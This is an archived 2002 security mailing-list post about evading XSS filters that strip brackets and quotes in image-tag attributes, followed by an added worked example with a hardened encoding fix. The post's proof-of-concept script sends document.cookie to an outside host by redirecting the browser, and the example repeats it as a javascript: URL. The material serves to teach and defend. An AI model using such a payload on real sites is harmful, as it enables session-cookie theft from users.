OSEC

From: b0iler (b0iler_at_eyeonsecurity.net)
Date: Thu Jul 18 2002 - 22:06:17 CDT


    As I have said before, filtering ( and ) does nothing to stop XSS if it is
    printed into a tag parameter. For instance:

    <img src="$userimg"> if $userimg is provided by user input.

    Now even if you strip < > ( ) ' and " you can still execute javascript.

    poc javascript (tested on Mozilla 0.9.9):

    var u = /http:site.com?/;
    var x = u.source + document.cookie;
    window.location=x;

    I am sure there are other ways to do this. Also remember that JavaScript is not
    the only XSS language, so filtering for XSS becomes next to impossible
    without allowing a-zA-Z0-9 only.

    I am sure someone can show you the use of # and & to circumvent XSS filters;
    it is used all the time. I might be writing a short paper on the topic of
    JavaScript filter evasion; if I do I'll be sure to post it here. (I am no
    JavaScript expert, so expect errors and obvious things done the hard way.)

    --
    http://b0iler.eyeonsecurity.net
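The point of the post above, shown as an added example that is not part of the original message: a filter that only strips < > ( ) ' and " leaves the regex-source payload untouched, the payload still assembles a cookie-bearing URL, and the fix is attribute encoding plus a scheme allow-list rather than character stripping. The naive filter, the javascript: URL used to carry the payload into an attribute, the fake cookie value, and the host names are assumptions for illustration; the browser is simulated so the code runs in Node.

```javascript
// Added example, not code from the original post.
// Naive filter of the kind the post criticises: it removes < > ( ) ' and "
// but leaves everything else through.
function naiveStrip(input) {
  return input.replace(/[<>()'"]/g, "");
}

// The post's three statements, packed into a javascript: URL (assumption:
// this is how it would be delivered through <img src="$userimg">).
// Note it contains none of the six characters the filter removes.
const PAYLOAD =
  "javascript:var u=/http:site.com?/;var x=u.source+document.cookie;window.location=x";

// What the payload does once it runs, simulated with a constructed cookie
// and a fake window object instead of a real browser.
function simulatePayload(cookie) {
  const fakeWindow = { location: null };
  const document = { cookie }; // stands in for the real DOM document
  // Equivalent to the statements in the post: RegExp.source yields the
  // literal text between the slashes, so no quotes are needed for the URL.
  var u = /http:site.com?/;
  var x = u.source + document.cookie;
  fakeWindow.location = x;
  return fakeWindow.location;
}

// Hardened approach: encode every character that has meaning inside an
// HTML attribute, so user input can never terminate the attribute.
function encodeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// And for a URL-valued attribute, also refuse any scheme that is not
// http(s), using the URL parser rather than a hand-written check so that
// whitespace and case tricks in the scheme are normalised away.
function safeImgSrc(userimg) {
  let protocol;
  try {
    // Resolve against a placeholder base (assumption) so relative paths still work.
    protocol = new URL(userimg, "https://app.example/").protocol;
  } catch (e) {
    protocol = null;
  }
  const url = protocol === "http:" || protocol === "https:" ? userimg : "about:blank";
  return `<img src="${encodeAttr(url)}">`;
}

// Stand-alone demonstration.
console.log("filter left payload intact:", naiveStrip(PAYLOAD) === PAYLOAD);
console.log("payload navigates to:", simulatePayload("session=abc123"));
console.log("hardened output:", safeImgSrc(PAYLOAD));
```

The hardened version does not try to recognise "bad" characters at all: encoding makes the attribute boundary unreachable, and the scheme allow-list removes the javascript: vector independently of how the rest of the string is spelled, which is why it survives the # and & tricks the post alludes to as well.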